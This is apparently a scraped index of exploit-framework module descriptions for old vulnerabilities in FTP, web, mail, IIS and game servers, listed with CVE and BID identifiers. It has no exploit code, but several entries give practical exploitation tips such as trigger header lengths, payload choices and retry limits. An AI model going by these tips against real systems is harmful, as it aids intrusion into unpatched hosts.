Ipswitch WS_FTP Server 5.05 XMD5 Overflow
This module exploits a buffer overflow in the XMD5 verb in IPSWITCH WS_FTP Server 5.05.
CVE-2006-4847
OSVDB-28939
BID-20076
Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit
This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered through an excessively long PWD message.
OSVDB-63968
http://www.exploit-db.com/exp...
Xlink FTP Client Buffer Overflow
This module exploits a stack buffer overflow in Xlink FTP Client 32 Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. When a overly long FTP server response is recieved by a client, arbitrary code may be executed.
CVE-2006-5792
OSVDB-33969
http://www.metasploit.com/
http://www.xlink.com
Xlink FTP Server Buffer Overflow
This module exploits a stack buffer overflow in Xlink FTP Server that comes bundled with Omni-NFS Enterprise 5.2. When a overly long FTP request is sent to the server, arbitrary code may be executed.
CVE-2006-5792
OSVDB-58646
http://www.metasploit.com/
http://www.xlink.com
Medal Of Honor Allied Assault getinfo Stack Buffer Overflow
This module exploits a stack based buffer overflow in the getinfo command of Medal Of Honor Allied Assault.
CVE-2004-0735
OSVDB-8061
http://www.milw0rm.com/exploi...
BID-10743
Racer v0.5.3 beta 5 Buffer Overflow
This module explots the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely.
CVE-2007-4370
OSVDB-39601
http://www.milw0rm.com/exploi...
BID-25297
Unreal Tournament 2004 "secure" Overflow (Win32)
This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times.
CVE-2004-0608
OSVDB-7217
BID-10570
Adobe RoboHelp Server 8 Arbitrary File Upload and Execute.
This module exploits a authentication bypass vulnerability which allows remote attackers to upload and execute arbitrary code.
CVE-2009-3068
OSVDB-57896
http://www.intevydis.com/blog...
http://www.zerodayinitiative....
Alt-N SecurityGateway username Buffer Overflow
Alt-N SecurityGateway is prone to a buffer overflow condition. This is due to insufficient bounds checking on the "username" parameter. Successful exploitation could result in code execution with SYSTEM level privileges. NOTE: This service doesn't restart, you'll only get one shot. However, it often survives a successful exploitation attempt.
CVE-2008-4193
OSVDB-45854
BID-29457
Alt-N WebAdmin USER Buffer Overflow
Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.
CVE-2003-0471
OSVDB-2207
BID-8024
NSS-11771
Apache Win32 Chunked Encoding
This module exploits the chunked transfer integer wrap vulnerability in Apache version 1.2.x to 1.3.24. This particular module has been tested with all versions of the official Win32 build between 1.3.9 and 1.3.24. Additionally, it should work against most co-branded and bundled versions of Apache (Oracle 8i, 9i, IBM HTTPD, etc). You will need to use the Check() functionality to determine the exact target version prior to launching the exploit. The version of Apache bundled with Oracle 8.1.7 will not automatically restart, so if you use the wrong target value, the server will crash.
CVE-2002-0392
OSVDB-838
BID-5033
http://lists.insecure.org/lis...
Apache module mod_rewrite LDAP protocol Buffer Overflow
This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. The flaw affects multiple platforms, however this module currently only supports Windows based installations.
CVE-2006-3747
OSVDB-27588
BID-19204
http://archives.neohapsis.com...
http://www.milw0rm.com/exploi...
http://www.milw0rm.com/exploi...
http://www.milw0rm.com/exploi...
Apache mod_jk 1.2.20 Buffer Overflow
This is a stack buffer overflow exploit for mod_jk 1.2.20. Should work on any Win32 OS.
CVE-2007-0774
OSVDB-33855
BID-22791
http://www.zerodayinitiative....
BadBlue 2.5 EXT.dll Buffer Overflow
BadBlue 2.72b PassThru Buffer Overflow
This module exploits a stack buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier.
CVE-2007-6377
OSVDB-42416
BID-26803
BEA WebLogic JSESSIONID Cookie Value Overflow
This module exploits a buffer overflow in BEA\'s WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a long JSESSION cookie value can lead to arbirtary code execution.
CVE-2008-5457
OSVDB-51311
BEA Weblogic Transfer-Encoding Buffer Overflow
This module exploits a stack based buffer overflow in the BEA Weblogic Apache plugin. This vulnerability exists in the error reporting for unknown Transfer-Encoding headers. You may have to run this twice due to timing issues with handlers.
CVE-2008-4008
OSVDB-49283
http://support.bea.com/applic...
Belkin Bulldog Plus Web Service Buffer Overflow
This module exploits a stack buffer overflow in Belkin Bulldog Plus 4.0.2 build 1219. When sending a specially crafted http request, an attacker may be able to execute arbitrary code.
OSVDB-54395
BID-34033
CA iTechnology iGateway Debug Mode Buffer Overflow
This module exploits a vulnerability in the Computer Associates iTechnology iGateway component. When <Debug>True</Debug> is enabled in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads.
CVE-2005-3190
OSVDB-19920
http://www.ca.com/us/security...
http://www.milw0rm.com/exploi...
BID-15025
EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing the 'path' parameter supplied to an HTTP GET request, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. After version 1.7.0.12, this package was renamed "UplusFtp". Due to limited space, as well as difficulties using an egghunter, the use of staged, ORD, and/or shell payloads is recommended.
OSVDB-66614
http://www.exploit-db.com/exp...
Novell eDirectory NDS Server Host Header Overflow
This module exploits a stack buffer overflow in Novell eDirectory 8.8.1. The web interface does not validate the length of the HTTP Host header prior to using the value of that header in an HTTP redirect.
CVE-2006-5478
OSVDB-29993
BID-20655
eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow
This module exploits a stack buffer overflow in eDirectory 8.7.3 iMonitor service. This vulnerability was discovered by Peter Winter-Smith of NGSSoftware. NOTE: repeated exploitation attempts may cause eDirectory to crash. It does not restart automatically in a default installation.
CVE-2005-2551
OSVDB-18703
BID-14548
EFS Easy Chat Server Authentication Request Handling Buffer Overflow
This module exploits a stack buffer overflow in EFS Software Easy Chat Server. By sending a overly long authentication request, an attacker may be able to execute arbitrary code. NOTE: The offset to SEH is influenced by the installation path of the program. The path, which defaults to "C:\Program Files\Easy Chat Server", is concatentated with "\users\" and the string passed as the username HTTP paramter.
CVE-2004-2466
OSVDB-7416
BID-25328
Free Download Manager Remote Control Server Buffer Overflow
This module exploits a stack buffer overflow in Free Download Manager Remote Control 2.5 Build 758. When sending a specially crafted Authorization header, an attacker may be able to execute arbitrary code.
CVE-2009-0183
OSVDB-51745
HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code.
CVE-2007-6204
OSVDB-39530
BID-26741
HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53. By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute arbitrary code. This specific vulnerability is due to a call to "sprintf_new" in the "isWide" function within "ovalarm.exe". A stack buffer overflow occurs when processing an HTTP request that contains the following. 1. An "Accept-Language" header longer than 100 bytes 2. An "OVABverbose" URI variable set to "on", "true" or "1" The vulnerability is related to "_WebSession::GetWebLocale()" .. NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.
CVE-2009-4179
OSVDB-60930
BID-37347
http://dvlabs.tippingpoint.co...
http://h20000.www2.hp.com/biz...
HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication SEH Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier. Specifically this vulnerability is caused by a failure to properly handle user supplied input within the HTTP request including headers and the actual URL GET request. Exploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode which was alphanumeric encoded by muts in the original exploit. If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process as soon as possible. Any connections get reset after a short period of time. This is probably some timeout handling code that causes this.
CVE-2008-1697
OSVDB-43992
BID-28569
HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute arbitrary code.
CVE-2009-4178
OSVDB-60929
BID-37340
HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute arbitrary code.
CVE-2009-3849
OSVDB-60933
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute arbitrary code.
CVE-2008-0067
OSVDB-53222
BID-33147
Hewlett-Packard Power Manager Administration Buffer Overflow.
This module exploits a stack buffer overflow in Hewlett-Packard Power Manager 4.2. Sending a specially crafted POST request with an overly long Login string, an attacker may be able to execute arbitrary code.
CVE-2009-2685
OSVDB-59684
HTTPDX h_handlepeer() Function Buffer Overflow
This module exploits a stack-based buffer overflow vulnerability in HTTPDX HTTP server 1.4. The vulnerability is caused due to a boundary error within the "h_handlepeer()" function in http.cpp. By sending an overly long HTTP request, an attacker can overrun a buffer and execute arbitrary code.
OSVDB-58714
CVE-2009-3711
http://www.pank4j.com/exploit...
http://www.rec-sec.com/2009/1...
HTTPDX tolog() Function Format String Vulnerability
This module exploits a format string vulnerability in HTTPDX HTTP server. By sending an specially crafted HTTP request containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user via FTP.
CVE-2009-4769
OSVDB-60182
IA WebMail 3.x Buffer Overflow
This exploits a stack buffer overflow in the IA WebMail server. This exploit has not been tested against a live system at this time.
CVE-2003-1192
OSVDB-2757
BID-8965
http://www.k-otik.net/exploit...
IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow
This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager for OS Deployment version 5.1.0.X.
CVE-2007-1868
OSVDB-34678
BID-23264
http://dvlabs.tippingpoint.co...
IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
CVE-2007-4880
OSVDB-38161
BID-25743
Icecast (<= 2.0.1) Header Overwrite (win32)
This module exploits a buffer overflow in the header parsing of icecast, discovered by Luigi Auriemma. Sending 32 HTTP headers will cause a write one past the end of a pointer array. On win32 this happens to overwrite the saved instruction pointer, and on linux (depending on compiler, etc) this seems to generally overwrite nothing crucial (read not exploitable). !! This exploit uses ExitThread(), this will leave icecast thinking the thread is still in use, and the thread counter won't be decremented. This means for each time your payload exits, the counter will be left incremented, and eventually the threadpool limit will be maxed. So you can multihit, but only till you fill the threadpool.
CVE-2004-1561
OSVDB-10406
BID-11271
http://archives.neohapsis.com...
InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow
This module exploits a stack buffer overflow in InterSystems Cache 2009.1. By sending a specially crafted GET request, an attacker may be able to execute arbitrary code.
OSVDB-60549
BID-37177
Ipswitch WhatsUp Gold 8.03 Buffer Overflow
This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By posting a long string for the value of 'instancename' in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system.
CVE-2004-0798
OSVDB-9177
BID-11043
MailEnable Authorization Header Buffer Overflow
This module exploits a remote buffer overflow in the MailEnable web service. The vulnerability is triggered when a large value is placed into the Authorization header of the web request. MailEnable Enterprise Edition versions priot to 1.0.5 and MailEnable Professional versions prior to 1.55 are affected.
CVE-2005-1348
OSVDB-15913
OSVDB-15737
BID-13350
NSS-18123
MaxDB WebDBM Database Parameter Overflow
This module exploits a stack buffer overflow in the MaxDB WebDBM service. By sending a specially-crafted HTTP request that contains an overly long database name. A remote attacker could overflow a buffer and execute arbitrary code on the system with privileges of the wahttp process. This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.
CVE-2006-4305
OSVDB-28300
BID-19660
MaxDB WebDBM GET Buffer Overflow
This module exploits a stack buffer overflow in the MaxDB WebDBM service. This service is included with many recent versions of the MaxDB and SAPDB products. This particular module is capable of exploiting Windows systems through the use of an SEH frame overwrite. The offset to the SEH frame may change depending on where MaxDB has been installed, this module assumes a web root path with the same length as: C:\Program Files\sdb\programs\web\Documents
CVE-2005-0684
OSVDB-15816
http://www.idefense.com/appli...
BID-13368
McAfee ePolicy Orchestrator / ProtectionPilot Overflow
This is an exploit for the McAfee HTTP Server (NAISERV.exe). McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are known to be vulnerable. By sending a large 'Source' header, the stack can be overwritten. This module is based on the exploit by xbxice and muts. Due to size constraints, this module uses the Egghunter technique. You may wish to adjust WfsDelay appropriately.
CVE-2006-5156
OSVDB-29421
http://www.milw0rm.com/exploi...
http://www.remote-exploit.org...
BID-20288
MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default), a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe, by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default), the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based overflow occurs when an excessively long From field is specified. The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes. Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait. Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will continue to crash/execute the payload until the CGI output is manually deleted from the queue in C:\MDaemon\RawFiles\*.raw.
CVE-2003-1200
OSVDB-3255
BID-9317
Minishare 1.4.1 Buffer Overflow
This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack buffer overflow that requires a "jmp esp" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
CVE-2004-2271
OSVDB-11530
BID-11620
http://archives.neohapsis.com...
NaviCOPA 2.0.1 URL Handling Buffer Overflow
This module exploits a stack buffer overflow in NaviCOPA 2.0.1. The vulnerability is caused due to a boundary error within the handling of URL parameters.
CVE-2006-5112
OSVDB-29257
BID-20250
Novell Messenger Server 2.0 Accept-Language Overflow
This module exploits a stack buffer overflow in Novell GroupWise Messenger Server v2.0. This flaw is triggered by any HTTP request with an Accept-Language header greater than 16 bytes. To overwrite the return address on the stack, we must first pass a memcpy() operation that uses pointers we supply. Due to the large list of restricted characters and the limitations of the current encoder modules, very few payloads are usable.
CVE-2006-0992
OSVDB-24617
BID-17503
Now SMS/MMS Gateway Buffer Overflow
This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27. By sending a specially crafted GET request, an attacker may be able to execute arbitrary code.
CVE-2008-0871
OSVDB-42953
BID-27896
Oracle 9i XDB HTTP PASS Overflow (win32)
This module exploits a stack buffer overflow in the authorization code of the Oracle 9i HTTP XDB service. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.
CVE-2003-0727
OSVDB-2449
BID-8375
http://www.blackhat.com/prese...
PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)
This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.
CVE-2006-1148
OSVDB-23777
BID-17040
http://www.infigo.hr/in_focus...
Private Wire Gateway Buffer Overflow
This exploits a buffer overflow in the ADMCREG.EXE used in the PrivateWire Online Registration Facility.
CVE-2006-3252
OSVDB-26861
BID-18647
PSO Proxy v0.91 Stack Buffer Overflow
This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten.
CVE-2004-0313
OSVDB-4028
http://www.milw0rm.com/exploi...
BID-9706
Sambar 6 Search Results Buffer Overflow
This module exploits a buffer overflow found in the /search/results.stm application that comes with Sambar 6. This code is a direct port of Andrew Griffiths's SMUDGE exploit, the only changes made were to the nops and payload. This exploit causes the service to die, whether you provided the correct target or not.
CVE-2004-2086
OSVDB-5786
BID-9607
SAP DB 7.4 WebTools Buffer Overflow
This module exploits a stack buffer overflow in SAP DB 7.4 WebTools. By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
CVE-2007-3614
OSVDB-37838
BID-24773
Savant 3.1 Web Server Overflow
This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service supports a maximum of 10 threads (for a default install). Each exploit attempt generally causes a thread to die whether sucessful or not. Therefore, in a default configuration, you only have 10 chances. Due to the limited space available for the payload in this exploit module, use of the "ord" payloads is recommended.
CVE-2002-1120
OSVDB-9829
BID-5686
http://www.milw0rm.com/exploi...
Rhinosoft Serv-U Session Cookie Buffer Overflow
This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5. Sending a specially crafted POST request with an overly long session cookie string, an attacker may be able to execute arbitrary code.
CVE-2009-4006
OSVDB-59772
http://rangos.de/ServU-ADV.txt
http://lists.grok.org.uk/pipe...
SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
This module exploits a format string vulnerability in the Nullsoft SHOUTcast server for Windows. The vulnerability is triggered by requesting a file path that contains format string specifiers. This vulnerability was discovered by Tomasz Trojanowski and Damian Put.
CVE-2004-1373
OSVDB-12585
BID-12096
SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)
This module exploits a stack buffer overflow in SHTTPD <= 1.34. The vulnerability is caused due to a boundary error within the handling of POST requests. Based on an original exploit by skOd but using a different method found by hdm.
CVE-2006-5216
OSVDB-29565
http://shttpd.sourceforge.net
BID-20393
Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow
This module exploits a stack buffer overflow in Streamcast <= 0.9.75. By sending an overly long User-Agent in an HTTP GET request, an attacker may be able to execute arbitrary code.
CVE-2008-0550
OSVDB-42670
http://aluigi.altervista.org/...
Sybase EAServer 5.2 Remote Stack Buffer Overflow
This module exploits a stack buffer overflow in the Sybase EAServer Web Console. The offset to the SEH frame appears to change depending on what version of Java is in use by the remote server, making this exploit somewhat unreliable.
CVE-2005-2297
OSVDB-17996
BID-14287
TrackerCam PHP Argument Buffer Overflow
This module exploits a simple stack buffer overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.
CVE-2005-0478
OSVDB-13953
OSVDB-13955
BID-12592
http://aluigi.altervista.org/...
Trend Micro OfficeScan Remote Stack Buffer Overflow
This module exploits a stack buffer overflow in Trend Micro OfficeScan cgiChkMasterPwd.exe (running with SYSTEM privileges).
CVE-2008-1365
OSVDB-42499
Xitami 2.5c2 Web Server If-Modified-Since Overflow
This module exploits a stack buffer overflow in the iMatix Corporation Xitami Web Server. If a malicious user sends an If-Modified-Since header containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique. You may wish to adjust WfsDelay appropriately.
CVE-2007-5067
OSVDB-40594
OSVDB-40595
BID-25772
http://www.milw0rm.com/exploi...
Novell ZENworks Configuration Management Remote Execution
This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0. By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory and then make a secondary request that allows for arbitrary code execution.
OSVDB-63412
BID-39114
http://www.zerodayinitiative....
http://tucanalamigo.blogspot....
Microsoft IIS WebDAV Write Access Code Execution
This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script using a WebDAV PUT request.
OSVDB-397
BID-12141
Microsoft IIS 5.0 Printer Host Header Overflow
This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 service pack 0 and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process.
CVE-2001-0241
OSVDB-3323
BID-2674
MSB-MS01-023
http://seclists.org/lists/bug...
Microsoft IIS/PWS CGI Filename Double Decode Command Execution
This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This module will leave a metasploit payload in the IIS scripts directory.
CVE-2001-0333
OSVDB-556
BID-2708
MSB-MS01-026
http://marc.info/?l=bugtraq&m...
Microsoft IIS 5.0 IDQ Path Overflow
This module exploits a stack buffer overflow in the IDQ ISAPI handler for Microsoft Index Server.
CVE-2001-0500
OSVDB-568
MSB-MS01-033
BID-2880
Microsoft IIS 4.0 .HTR Path Overflow
This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have trouble terminating a bind shell. If you set EXITFUNC to thread, the server will crash upon exit of the bind shell. The payload is alpha-numerically encoded without a NOP sled because otherwise the data gets mangled by the filters.
CVE-1999-0874
OSVDB-3325
BID-307
http://www.eeye.com/html/rese...
MSB-MS02-018
Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against any service pack.
CVE-2003-0109
OSVDB-4467
BID-7116
MSB-MS03-007
Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this particular vulnerability. NOTE: The service does NOT restart automatically by default. You may be limited to only one attempt, so choose wisely!
CVE-2005-4267
OSVDB-22097
BID-15980
IMail IMAP4D Delete Overflow
This module exploits a buffer overflow in the 'DELETE' command of the the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14.
CVE-2004-1520
OSVDB-11838
BID-11675
Ipswitch IMail IMAP SEARCH Buffer Overflow
This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. In order for this module to be successful, the IMAP user must have at least one message.
CVE-2007-3925
OSVDB-36219
BID-24962
MailEnable IMAPD (2.35) Login Request Buffer Overflow
MailEnable's IMAP server contains a buffer overflow vulnerability in the Login command.
CVE-2006-6423
OSVDB-32125
BID-21492
http://lists.grok.org.uk/pipe...
MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
MailEnable's IMAP server contains a buffer overflow vulnerability in the STATUS command. With proper credentials, this could allow for the execution of arbitrary code.
CVE-2005-2278
OSVDB-17844
BID-14243
NSS-19193
MailEnable IMAPD W3C Logging Buffer Overflow
This module exploits a buffer overflow in the W3C logging functionality of the MailEnable IMAPD service. Logging is not enabled by default and this exploit requires a valid username and password to exploit the flaw. MailEnable Professional version 1.6 and prior and MailEnable Enterprise version 1.1 and prior are affected.
CVE-2005-3155
OSVDB-19842
BID-15006
Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
This module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. This vulnerability was discovered by Muts.
CVE-2004-1520
OSVDB-11838
BID-11675
MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP account credentials are required. Credit to Matteo Memelli
CVE-2008-1358
OSVDB-43111
BID-28245
http://www.milw0rm.com/exploi...
Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
Mercur v5.0 IMAP server is prone to a remotely exploitable stack-based buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. Credit to Tim Taylor for discover the vulnerability.
CVE-2006-1255
OSVDB-23950
BID-17138
Mercur Messaging 2005 IMAP Login Buffer Overflow
This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results.
CVE-2006-1255
OSVDB-23950
BID-17138
http://archives.neohapsis.com...
Mercury/32 <= 4.01b LOGIN Buffer Overflow
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).
CVE-2007-1373
OSVDB-33883
Mercury/32 v4.01a IMAP RENAME Buffer Overflow
This module exploits a stack buffer overflow vulnerability in the Mercury/32 v.4.01a IMAP service.
CVE-2004-1211
OSVDB-12508
BID-11775
NSS-15867
Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow
This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.
CVE-2006-6425
OSVDB-31362
BID-21723
http://www.zerodayinitiative....
Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow
This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE GSSAPI command. By sending an overly long string, an attacker can overwrite the buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp or windows/shell_reverse_tcp allows for the most reliable results.
OSVDB-55175
http://www.w00t-shell.net/#
Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow
This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.
CVE-2005-3314
OSVDB-20956
BID-15491
Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow
This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.
CVE-2006-6761
OSVDB-31360
BID-21728
http://labs.idefense.com/inte...
Microsoft IIS Phone Book Service Overflow
This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. This module has only been tested against Windows 2000 SP1.
CVE-2000-1089
OSVDB-463
BID-2048
MSB-MS00-094
Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.
CVE-2003-0349
OSVDB-4535
BID-8035
MSB-MS03-022
http://archives.neohapsis.com...
Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow
This is an exploit for the chunked encoding buffer overflow described in MS03-051 and originally reported by Brett Moore. This particular modules works against versions of Windows 2000 between SP0 and SP3. Service Pack 4 fixes the issue.
CVE-2003-0822
OSVDB-2952
BID-9007
MSB-MS03-051
Microsoft IIS ISAPI RSA WebAgent Redirect Overflow
This module exploits a stack buffer overflow in the SecurID Web Agent for IIS. This ISAPI filter runs in-process with inetinfo.exe, any attempt to exploit this flaw will result in the termination and potential restart of the IIS service.
CVE-2005-4734
OSVDB-20151
Microsoft IIS ISAPI w3who.dll Query String Overflow
This module exploits a stack buffer overflow in the w3who.dll ISAPI application. This vulnerability was discovered Nicolas Gregoire and this code has been successfully tested against Windows 2000 and Windows XP (SP2). When exploiting Windows XP, the payload must call RevertToSelf before it will be able to spawn a command shell.
CVE-2004-1134
OSVDB-12258
http://www.exaprobe.com/labs/...
BID-11820
IMail LDAP Service Buffer Overflow
This exploits a buffer overflow in the LDAP service that is part of the IMail product. This module was tested against version 7.10 and 8.5, both running on Windows 2000.
CVE-2004-0297
OSVDB-3984
BID-9682
http://secunia.com/advisories...
Computer Associates License Client GETCONFIG Overflow
This module exploits an vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug.
CVE-2005-0581
OSVDB-14389
BID-12705
http://labs.idefense.com/inte...
Computer Associates License Server GETCONFIG Overflow
This module exploits an vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet the stack may be overwritten.
CVE-2005-0581
OSVDB-14389
BID-12705
http://labs.idefense.com/inte...
SentinelLM UDP Buffer Overflow
This module exploits a simple stack buffer overflow in the Sentinel License Manager. The SentinelLM service is installed with a wide selection of products and seems particular popular with academic products. If the wrong target value is selected, the service will crash and not restart.
CVE-2005-0353
OSVDB-14605
BID-12742
IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow
This module exploits a stack buffer overflow in IBM Lotus Domino Web Server prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP request with an Accept-Language header greater than 114 bytes.
CVE-2008-2240
OSVDB-45415
BID-29310
http://www-01.ibm.com/support...
IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow
This module exploits a stack buffer overflow in Lotus Domino\'s Sametime Server. By sending an overly long POST request to the Multiplexer STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez.
CVE-2008-2499
OSVDB-45610
BID-29328
http://www.zerodayinitiative....
Hummingbird Connectivity 10 SP5 LPD Buffer Overflow
